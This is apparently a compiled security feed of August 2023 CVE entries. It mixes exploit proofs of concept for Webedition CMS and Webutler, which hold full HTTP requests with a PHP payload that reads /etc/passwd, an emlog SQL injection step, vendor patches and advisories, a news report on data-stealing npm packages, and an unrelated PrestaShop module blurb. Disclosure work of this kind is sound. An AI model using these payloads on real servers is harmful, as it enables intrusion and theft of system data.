Webedition CMS version 2.9.8.8 suffers from a remote code execution vulnerability.

    Exploit Title: Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)Application: webedition CmsVersion: v2.9.8.8   Bugs:  RCETechnology: PHPVendor URL: https://www.webedition.org/Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1Date of found: 03.08.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps1. Login account2. Go to New -> Webedition page -> empty page3. Select php4. Set as "><?php echo system("cat /etc/passwd");?>  Description areaPoc request: POST /webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd HTTP/1.1Host: localhostContent-Length: 1621Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0ddAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300Connection: closewe_transaction=4fd880c06df5a590754ce5b8738cd0dd&we_003be033b474a5c25132d388906fb4ae_Filename=poc&we_003be033b474a5c25132d388906fb4ae_Extension=.php&wetmp_we_003be033b474a5c25132d388906fb4ae_Extension=&we_003be033b474a5c25132d388906fb4ae_ParentPath=%2F&we_003be033b474a5c25132d388906fb4ae_ParentID=0&yuiAcContentTypeParentPath=&we_003be033b474a5c25132d388906fb4ae_DocType=&we_003be033b474a5c25132d388906fb4ae_TemplateName=%2F&we_003be033b474a5c25132d388906fb4ae_TemplateID=&yuiAcContentTypeTemplate=&we_003be033b474a5c25132d388906fb4ae_IsDynamic=0&we_003be033b474a5c25132d388906fb4ae_IsSearchable=0&we_003be033b474a5c25132d388906fb4ae_InGlossar=0&we_003be033b474a5c25132d388906fb4ae_txt%5BTitle%5D=asdf&we_003be033b474a5c25132d388906fb4ae_txt%5BDescription%5D=%22%3E%3C%3Fphp+echo+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E&we_003be033b474a5c25132d388906fb4ae_txt%5BKeywords%5D=asdf&fold%5B0%5D=0&fold_named%5BPropertyPage_3%5D=0&we_003be033b474a5c25132d388906fb4ae_Language=en_GB&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Bde_DE%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Bde_DE%5D=&yuiAcContentTypeLanguageDocdeDE=&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Ben_GB%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Ben_GB%5D=&yuiAcContentTypeLanguageDocenGB=&fold%5B1%5D=0&fold_named%5BPropertyPage_4%5D=0&we_003be033b474a5c25132d388906fb4ae_CopyID=0&fold%5B2%5D=0&fold_named%5BPropertyPage_6%5D=0&wetmp_003be033b474a5c25132d388906fb4ae_CreatorID=%2Fadmin&we_003be033b474a5c25132d388906fb4ae_CreatorID=1&we_003be033b474a5c25132d388906fb4ae_RestrictOwners=0&we_complete_request=1

Webedition CMS 2.9.8.8 Remote Code Execution

Webutler version 3.2 suffers from a remote shell upload vulnerability.

    Exploit Title: Webutler v3.2 - Remote Code Execution (RCE)Application: webutler CmsVersion: v3.2Bugs:  RCETechnology: PHPVendor URL: https://webutler.de/enSoftware Link: http://webutler.de/download/webutler_v3.2.zipDate of found: 03.08.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1. login to account as admin2. go to visit media 3.upload phar file4. upload poc.phar filepoc.phar file contents :<?php echo system("cat /etc/passwd");?>5. Visit to poc.phar filepoc request:POST /webutler_v3.2/admin/browser/index.php?upload=newfile&types=file&actualfolder=%2F&filename=poc.phar&overwrite=true HTTP/1.1Host: localhostContent-Length: 40sec-ch-ua: sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36X_FILENAME: poc.pharsec-ch-ua-platform: ""Accept: */*Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/webutler_v3.2/admin/browser/index.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: WEBUTLER=ekgfsfhi3ocqdvv7ukqoropoluConnection: close<?php echo system("cat /etc/passwd");?>

Webutler 3.2 Shell Upload

Cybersecurity researchers have discovered a new bunch of malicious packages on the npm package registry that are designed to exfiltrate sensitive developer information.
Software supply chain firm Phylum, which first identified the "test" packages on July 31, 2023, said they "demonstrated increasing functionality and refinement," hours after which they were removed and re-uploaded under different

Cybersecurity researchers have discovered a new bunch of malicious packages on the npm package registry that are designed to exfiltrate sensitive developer information.

Software supply chain firm Phylum, which first identified the "test" packages on July 31, 2023, said they "demonstrated increasing functionality and refinement," hours after which they were removed and re-uploaded under different, legitimate-sounding package names.

While the end goal of the undertaking is not clear, it's suspected to be a highly targeted campaign aimed at the cryptocurrency sector based on references to modules such as "rocketrefer" and "binarium."

All the packages were published by the npm user malikrukd4732. A common feature across all the modules is the ability to launch JavaScript ("index.js") that's equipped to exfiltrate valuable information to a remote server.

"The index.js code is spawned in a child process by the preinstall.js file," the Phylum researcher team said. "This action is prompted by the postinstall hook defined in the package.json file, which is executed upon package installation."

The first step entails gathering the current operating system username and the current working directory, following which a GET request with the collected data is sent to 185.62.57\[.\]60:8000/http. The exact motivation behind this action is currently unknown, although it's believed that the information could be used to trigger "unseen server-side behaviors."

Subsequently, the script proceeds to look for files and directories matching a specific set of extensions: .env, .svn, .gitlab, .hg, .idea, .yarn, .docker, .vagrant, .github, .asp, .js, .php, .aspx, .jspx, .jhtml, .py, .rb, .pl, .cfm, .cgi, .ssjs, .shtml, .env, .ini, .conf, .properties, .yml, and .cfg.

The harvested data, which could also contain credentials and valuable intellectual property, is ultimately transmitted to the server in the form of a ZIP archive file.

"While these directories can have sensitive information, it's more likely they contain a lot of standard application files which are not unique to the victim's system and hence less valuable to the attacker, whose motive appears to be centered around extraction of source code or environment-specific configuration files," Phylum said.

The development is the latest example of open-source repositories being used to propagate malicious code, what with ReversingLabs identifying a PyPI campaign that employs suspicious python packages such as VMConnect to contact a command-and-control (C2) server and attempt to download an unspecified Base64-encoded string with additional commands.

"Since the command fetching is performed in an endless loop, it is possible that the operator of the C2 server uploads commands only after the infected machine is determined to be interesting to the threat actor," security researcher Karlo Zanki explained.

"Alternatively, the C2 server could be performing some type of request filtering. For example, attackers may filter requests based on the IP address of the infected machine to avoid infecting targets from specific countries."

In early July 2023, ReversingLabs also exposed a batch of 13 rogue npm modules that were collectively downloaded around 1,000 times as part of a novel campaign dubbed Operation Brainleeches.

What makes the activity stand out its use of some of the packages to facilitate credential harvesting via bogus Microsoft 365 login forms launched from a JavaScript email attachment, a JavaScript file that fetches the next-stage payloads from jsDelivr, a content delivery network (CDN) for packages hosted on npm.

In other words, the published npm modules act as a supporting infrastructure for hosting files used in email phishing attacks as well as carrying out supply chain attacks directed against developers.

The latter is accomplished by implanting credential harvesting scripts in applications that inadvertently incorporate the fraudulent npm packages. The libraries were posted to npm between May 11 and June 13, 2023.

"One of the key benefits of jsDelivr is the direct file links: Instead of using npm to install the package and reference it locally, you can directly link to the file hosted on jsDelivr's CDN," Check Point, which also reported on the same campaign, said. "But \[...\] even legit services such as the jsDelivr CDN can be abused for malicious purposes."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

 Malicious npm Packages Found Exfiltrating Sensitive Data from Developers

The WP Ultimate CSV Importer plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 7.9.8 via the '->cus2' parameter. This allows authenticated attackers with author-level permissions or above, if the administrator previously grants access in the plugin settings, to create a PHP file and execute code on the server. The author resolved this vulnerability by removing the ability for authors and editors to import files, please note that this means php file creation is still allowed for site administrators, use the plugin with caution.

*   **wp-ultimate-csv-importer/trunk/wp-ultimate-csv-importer.php**
    
    r2943068
    
    r2944635
    
     
    
    112
    
    112
    
                if ( is\_user\_logged\_in() &&  current\_user\_can('manage\_options') ) {
    
    113
    
    113
    
                    add\_action('admin\_menu',array(\_\_CLASS\_\_,'testing\_function'));
    
    114
    
     
    
                }
    
    115
    
     
    
            }else{
    
    116
    
     
    
                if ( is\_user\_logged\_in() && ( current\_user\_can( 'edit\_published\_posts')) && (in\_array('editor',$role) || in\_array('author',$role)) && $ucisettings\['author\_editor\_access'\] == "true" ) {   
    
    117
    
     
    
                    add\_action('admin\_menu',array(\_\_CLASS\_\_,'editor\_menu'));
    
    118
    
    114
    
                }
    
    119
    
    115
    
            }
    
    …
    
    …
    
     
    
    386
    
    382
    
            $upload = wp\_upload\_dir();
    
    387
    
    383
    
            $upload\_dir = $upload\['basedir'\];
    
    388
    
     
    
            if(!is\_dir($upload\_dir)){
    
    389
    
     
    
                return false;
    
    390
    
     
    
            }else{
    
    391
    
     
    
                $upload\_dir = $upload\_dir . '/smack\_uci\_uploads/imports/';
    
    392
    
     
    
                if (!is\_dir($upload\_dir)) {
    
    393
    
     
    
                    wp\_mkdir\_p( $upload\_dir);
    
    394
    
     
    
                }
    
     
    
    384
    
                if(!is\_dir($upload\_dir)){
    
     
    
    385
    
                    return false;
    
     
    
    386
    
                }else{
    
     
    
    387
    
                    $upload\_dir = $upload\_dir . '/smack\_uci\_uploads/imports/';
    
     
    
    388
    
                    if (!is\_dir($upload\_dir)) {
    
     
    
    389
    
                        wp\_mkdir\_p($upload\_dir);
    
     
    
    390
    
                        chmod($upload\_dir, 0755);
    
     
    
    391
    
     
    
    392
    
                        $index\_php\_file = $upload\_dir . 'index.php';
    
     
    
    393
    
                        if (!file\_exists($index\_php\_file)) {
    
     
    
    394
    
                            $file\_content = '<?php' . PHP\_EOL . '?>';
    
     
    
    395
    
                            file\_put\_contents($index\_php\_file, $file\_content);
    
     
    
    396
    
                        }
    
     
    
    397
    
                    }
    
    395
    
    398
    
                if($mode != 'CLI')
    
    396
    
    399
    
                {
    
    397
    
    400
    
                    chmod($upload\_dir, 0777);
    
    398
    
    401
    
                }
    
    399
    
     
    
                $exports\_dir = $upload\['basedir'\] . '/smack\_uci\_uploads/exports/';
    
    400
    
     
    
            if (!is\_dir($exports\_dir)) {
    
     
    
    402
    
     
    
    403
    
                $exports\_dir = $upload\['basedir'\] . '/smack\_uci\_uploads/exports/';
    
     
    
    404
    
              if (!is\_dir($exports\_dir)) {
    
    401
    
    405
    
                wp\_mkdir\_p($exports\_dir);
    
    402
    
    406
    
                chmod($exports\_dir, 0755);
    
    …
    
    …
    
     
    
    407
    
    411
    
                    file\_put\_contents($index\_php\_file, $file\_content);
    
    408
    
    412
    
                }
    
     
    
    413
    
            }
    
     
    
    414
    
    409
    
    415
    
                return $upload\_dir;
    
    410
    
    416
    
            }
    
    411
    
    417
    
        }
    
    412
    
     
    
            if($mode != 'CLI')
    
    413
    
     
    
            {
    
    414
    
     
    
                chmod($upload\_dir, 0777);
    
    415
    
     
    
            }           
    
    416
    
     
    
            return $upload\_dir;
    
    417
    
     
    
        }
    
    418
    
     
    
     
    
    418
    
       
    
    419
    
    419
    
        public function delete\_image\_schedule()
    
    420
    
    420
    
        {
    
    …
    
    …
    
     
    
    508
    
    508
    
                loadbasic();
    
    509
    
    509
    
            }
    
    510
    
     
    
        }else{
    
    511
    
     
    
            if ( is\_user\_logged\_in() && ( current\_user\_can( 'edit\_published\_posts')) && (in\_array('editor',$role) || in\_array('author',$role)) && $ucisettings\['author\_editor\_access'\] == "true" ) {
    
    512
    
     
    
                loadbasic();
    
    513
    
     
    
            }
    
    514
    
    510
    
        }
    
    515
    
    511
    
    }

CVE-2023-4141: Changeset 2944635 for wp-ultimate-csv-importer/trunk/wp-ultimate-csv-importer.php – WordPress Plugin Repository

Sulu is an open-source PHP content management system based on the Symfony framework. It allows over the Admin Login form to detect which user (username, email) exists and which one do not exist. Sulu Installation not using the old Symfony 5.4 security System and previous version are not impacted by this Security issue. The vulnerability has been patched in version 2.5.10. 



@@ -0,0 +1,82 @@ <?php  
/\* \* This file is part of Sulu. \* \* (c) Sulu GmbH \* \* This source file is subject to the MIT license that is bundled \* with this source code in the file LICENSE. \*/  
namespace Sulu\\Bundle\\SecurityBundle\\Tests\\Functional\\Security;  
use Sulu\\Bundle\\TestBundle\\Testing\\SuluTestCase;  
class AuthenticationHandlerTest extends SuluTestCase { public function testLoginFail(): void { $client = $this\->createClient(\[\], \[ 'CONTENT\_TYPE' => 'application/json', 'HTTP\_ACCEPT' => 'application/json', 'HTTP\_X-Requested-With' => 'XMLHttpRequest', \]);  
$client\->request('POST', '/admin/login', \[\], \[\], \[\], '{"username": "not-existing-user", "password": "wrong"}');  
$response = $client\->getResponse(); $this\->assertHttpStatusCode(401, $response); $notExistUserContent = $response\->getContent();  
$this\->assertSame('{"message":"Invalid credentials."}', $notExistUserContent); }  
public function testLoginSuccess(): void { $client = $this\->createClient(\[\], \[ 'CONTENT\_TYPE' => 'application/json', 'HTTP\_ACCEPT' => 'application/json', 'HTTP\_X-Requested-With' => 'XMLHttpRequest', \]);  
$testUser = $this\->getTestUser();  
$client\->request('POST', '/admin/login', \[\], \[\], \[\], '{"username": "' . $testUser\->getUsername() . '", "password": "test"}');  
$response = $client\->getResponse(); $this\->assertHttpStatusCode(200, $response); $notExistUserContent = $response\->getContent();  
$this\->assertSame( '{"url":"\\/admin\\/","username":"test","completed":true,"twoFactorMethods":\["trusted\_devices"\]}', $notExistUserContent ); }  
public function testLoginFailExistUserHasSameMessageAsNotExist(): void { $client = $this\->createClient(\[\], \[ 'CONTENT\_TYPE' => 'application/json', 'HTTP\_ACCEPT' => 'application/json', 'HTTP\_X-Requested-With' => 'XMLHttpRequest', \]);  
$testUser = $this\->getTestUser();  
$client\->request('POST', '/admin/login', \[\], \[\], \[\], '{"username": "not-existing-user", "password": "wrong"}');  
$response = $client\->getResponse(); $this\->assertHttpStatusCode(401, $response); $notExistUserContent = $response\->getContent();  
$client\->request('POST', '/admin/login', \[\], \[\], \[\], '{"username": "' . $testUser\->getUsername() . '", "password": "wrong"}');  
$response = $client\->getResponse(); $this\->assertHttpStatusCode(401, $response); $existUserContent = $response\->getContent();  
$this\->assertSame($notExistUserContent, $existUserContent); $this\->assertSame('{"message":"Invalid credentials."}', $notExistUserContent); } }

CVE-2023-39343: Merge pull request from GHSA-wmwf-49vv-p3mr · sulu/sulu@5f6c98b

User enumeration is found in in PHPJabbers Cleaning Business Software 1.0. This issue occurs during password recovery, where a difference in messages could allow an attacker to determine if the user is valid or not, enabling a brute force attack with valid users.

CVE-2023-36141

ai-dev aitable before v0.2.2 was discovered to contain a SQL injection vulnerability via the component /includes/ajax.php.

**More info**

To familiarize yourself with what is done on the web, you have **visited** several sites in the **same field** as yours, and you have **realized** that all had a c**ommon point**, and not a good point, the **visual bland** and **standardized** that everyone uses, either for **lack of means** or **lack of creativity**, and suddenly you say that customers always see the same thing, and that their choice is therefore only on the prices.

So you are **tired** of the simple but **not very exciting** display of Prestashop, this technique will allow you on one hand to revive the **interest of visitors** to your site compared to competitors, which can cause a purchase even if your rates are a little above those practiced in the area, but you can also look to put important information **more visible** and especially to distinguish yourself from the competition by adding a **more ergonomic** and **fun display** for you customers.

**Simplify the display of some attributes** and make understanding of these **simplest to your customers** is exactly what provides the **attribute display in a table module**.

At a glance, the **prices of both attributes are visible** to the customer and his **choice is simplified**, no need to go through the different attribute values to get a purchase price.

This module allows to define two attributes that will be displayed as a table.

The first attribute (the one displayed in columns) can be a delay attribute for **delivery for** **example** in this case you can determine the days to be taken into account for the calculation of delivery time, public holidays are automa

tically taken into account.

**The module is fully skinnable.**  

Links to download the documentations of the module are available at the bottom of the page.

**Prestashop compatible v****ersions**

1.6 & 1.7

**module** **version**

0.2.2

Demo url

**Download**

CVE-2023-33665: Ergonomie : Table attributes

emlog v2.1.9 was discovered to contain a SQL injection vulnerability via the component /admin/user.php.

1.  First log in to the administrator's background home page, find System -> Data -> Click Start Backup, first get an sql file  
    http://127.0.0.1/emlog/admin/data.php
2.  Modify the sql file and add a line of code to the user table of the database

POC:  
INSERT INTO emlog\_user VALUES('110','','$P$BnTaZnToynOoAVP6T/MiTsZc9ZAQNg.',(select user()),'writer','n','','123@qq.com','','','0','1687261845','1687261845');  
3\. Save the sql file - > and then select Import sql file, select the modified sql file just now, click Import, if successful, the import success will be displayed, and then click User module  
http://127.0.0.1/emlog/admin/user.php, you'll find the SQL statement is executed successfully

CVE-2023-39121: There is sql injection in the background of emlog 2.1.9. · Issue #1 · safe-b/CVE

ai-dev aioptimizedcombinations before v0.1.3 was discovered to contain a SQL injection vulnerability via the component /includes/ajax.php.

In the module “Customization fields fee for your store” (aioptimizedcombinations) for PrestaShop, an attacker can perform a SQL injection up to 0.1.2. Release 0.1.3 fixed this security issue.

**Summary**

*   **CVE ID**: CVE-2023-33666
*   **Published at**: 2023-08-03
*   **Advisory source**: Friends-Of-Presta.org
*   **Platform**: PrestaShop
*   **Product**: aioptimizedcombinations
*   **Impacted release**: <= 0.1.2 (0.1.3 fixed issue)
*   **Product author**: ai-dev
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

Up to 0.1.3, a sensitive SQL call in file includes/ajax.php can be executed with a trivial http call and exploited to forge a blind SQL injection throught the POST or GET submitted attributes variables.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Technical and personal data leaks
*   Obtain admin access
*   Remove all data of the linked PrestaShop
*   Display sensitives tables to front-office to unlock potential admin’s ajax scripts of modules protected by token on the ecosystem

**Patch**

    --- a/modules/aioptimizedcombinations/includes/ajax.php
    +++ b/modules/aioptimizedcombinations/includes/ajax.php
    switch (Tools::getValue('action'))
    {
    	case 'getCombination' :
    		/* If no product or combination, we quit */
    		if (!Tools::getIsset('product') || !Tools::getIsset('attributes'))
    			die();
    
    		$attributes = explode(',', Tools::getValue('attributes'));
    		
    		/* Get combination id */
    		$combination_data = Db::getInstance()->getRow(
    			'SELECT COUNT(*) as number, pa.id_product_attribute FROM '._DB_PREFIX_.'product_attribute AS pa LEFT JOIN '._DB_PREFIX_.'product_attribute_combination AS pac ON pa.id_product_attribute = pac.id_product_attribute WHERE pa.id_product = '.
    -			(int)Tools::getValue('product').' AND pac.id_attribute IN ('.pSQL(Tools::getValue('attributes')).') GROUP BY pa.id_product_attribute HAVING number = '.count($attributes)
    +			(int)Tools::getValue('product').' AND pac.id_attribute IN ('.implode(',', array_map('intval', explode(',', Tools::getValue('attributes')))).') GROUP BY pa.id_product_attribute HAVING number = '.count($attributes)
    		);
    

**Other recommandations**

*   Upgrade PrestaShop to the latest version to disable multiquery execution (separated by “;”) - be warned that this functionality **WILL NOT** protect your SHOP against injection SQL which uses the UNION clause to steal data.
*   Change the default database prefix ps_ by a new longer arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skills because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against these set of rules.

**Timeline**

Date

Action

2023-05-08

Vunlnerability found during a audit by 202 ecommerce

2023-05-10

Contact the author

2023-05-12

The author confirm the issue and supply a fixed release

2023-05-12

Request a CVE ID

2023-08-03

Publication of this advisory

**Links**

*   Author product page
*   National Vulnerability Database

CVE-2023-33666: [CVE-2023-33666] Improper neutralization of a SQL parameter in aioptimizedcombinations from ai-dev module for PrestaShop

Fabasoft Cloud Enterprise Client 23.3.0.130 allows a user to escalate their privileges to local administrator.

################################################################################ # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ################################################################################ # # Product: Fabasoft Cloud Enterprise Client # Vendor: Fabasoft # Vendor ID: PDO06614 # CSNC ID: CSNC-2023-002 # CVE ID: CVE-2023-32764 # Subject: Local Privilege Escalation # Risk: High # Effect: Locally exploitable # Authors: Tino Kautschke # Dennis Henke # Date: 08.05.2023 # ################################################################################ Introduction: ------------- The Fabasoft Cloud lets you create a digital business network for your company based on relationships of trust – for secure cross-company, transnational collaboration in the cloud. Fabasoft provides a native client that allows, for example, editing documents directly via the web client or synchronizing documents on the device. \[1-3\] Compass Security identified a local privilege escalation vulnerability, allowing a user on a system with the Fabasoft Cloud Enterprise Client installed, to escalate their privileges to local administrator. Affected: --------- Vulnerable (tested): \* Fabasoft Cloud Enterprise Client 23.3.0.130 / 23.3.130 Not vulnerable (tested): \* Fabasoft Cloud Enterprise Client 23.6.0.99 / 23.6.99 Not vulnerable (regarding vendor announcement): \* 23.4.0.66 and above \* 23.0.1.23 and above \* 22.9.0.75 and above \* 22.0.3.88 and above \* 21.1.3.204 and above Other products were affected (Windows only): Fabasoft Folio / eGov-Suite 2021 Update Rollup 3 Fabasoft Folio / eGov-Suite 2022 (up to Update Rollup 3 and Feature Track) Fabasoft Folio / eGov-Suite 2023 (up to Update Rollup 1) Fabasoft Cloud Technical Description: ---------------------- The Fabasoft Cloud Enterprise Client uses an update service named FabasoftCloudUS.exe, which is executed with SYSTEM privileges. On update, it looks for new update files in C:\\ProgramData\\fabasoft.plugin, which can be read and written to by arbitrary users. The update service expects a signed MSI file and an empty file with extension '.pending' in this folder to start the update process. The update mechanism after successful validation of a signed MSI file is vulnerable. It is possible to place a Fabasoft-signed MSI update or setup file to pass the validation check. After that, the MSI file will be renamed and handed over to the msiexec setup process. During this step, it is possible to re-rename the file and exchange it with an arbitrary MSI package. A commandline script can do the job and performs the renaming operations in a loop to exchange the MSI package once it is possible, before the update process will hand over the file to msiexec. The update process will produce some access errors first, because of the renaming operation, but it has some tolerance and retries to access the file. The exchanged malicious MSI package will be taken, handed over to msiexec and installed with SYSTEM privileges. This means that an unprivileged user can install arbitrary MSI packages, thus resulting in code execution with full SYSTEM permissions. This can be used, e.g., to start a reverse shell or execute other malicious commands. Workaround / Fix: ----------------- The processing of MSI packages during the update process should be revised to ensure, that it is not possible to exchange any packages originated from untrusted sources. A patch has already been released by the publisher. The update service should install update packages from a folder for which non-admin users do not have change or modify privileges. Microsofts guidelines and best-practices for MSI packages should be considered during development. In general, the update service should not run in a high privileged context like SYSTEM. It is recommended to set up a dedicated service user with neccessary privileges only. As a customer using the Fabasoft Cloud Enterprise Client, update your installation to the latest version. Workaround: disable Fabasoft Folio Client Update Service "folioupdate" or "folioupdatepm2X". Timeline: --------- 2023-05-08: Discovery by Tino Kautschke and Dennis Henke 2023-05-08: Initial vendor notification 2023-05-08: CVE number requested 2023-05-15: CVE number reserved: CVE-2023-32764 2023-06-09: Test of version 23.6.99, vulnerability has been fixed 2023-07-04: Last public vulnerability announcement by vendor (PDO06614) \[4\] 2023-08-02: Coordinated disclosure of the advisory References: ----------- \[1\] https://help.cloud.fabasoft.com/index.php?topic=doc/User-Help-Fabasoft-Cloud-eng/introduction.htm \[2\] https://help.cloud.fabasoft.com/index.php?topic=doc/Fabasoft-Cloud-Client/introduction.htm \[3\] https://help.cloud.fabasoft.com/index.php?topic=doc/Technical-Information-eng/the-fabasoft-cloud-enterprise-client.htm \[4\] https://help.supportservices.fabasoft.com/index.php?topic=doc/Vulnerabilities-Fabasoft-Folio/vulnerabilities-2023.htm#client-autoupdate-harmful-code-installation-vulnerability-pdo06614-

Tag

#php